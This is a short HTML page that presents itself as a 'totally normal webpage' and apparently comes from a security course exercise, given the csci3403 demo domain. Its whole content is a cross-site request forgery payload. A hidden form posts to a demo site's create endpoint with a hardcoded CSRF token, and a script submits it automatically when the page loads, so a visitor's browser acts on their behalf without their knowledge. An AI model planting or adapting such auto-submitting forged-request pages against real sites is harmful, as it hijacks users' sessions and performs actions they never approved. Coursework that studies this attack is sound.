<h1>Welcome to my totally normal webpage!</h1>

<form id="evil-form" action="https://demo.csci3403.com/create" method="POST" onsubmit="return false">
    <input type="text" name="content" value="I am bad at security!">
    <input type="text" name="csrf_token" value="ImNhM2U1MTIxMWJiM2Q2OGFjYmYxODc5MDVmMzUzN2I0YWZkN2UyOTQi">
</form>

<script>
document.getElementById("evil-form").submit()
</script>
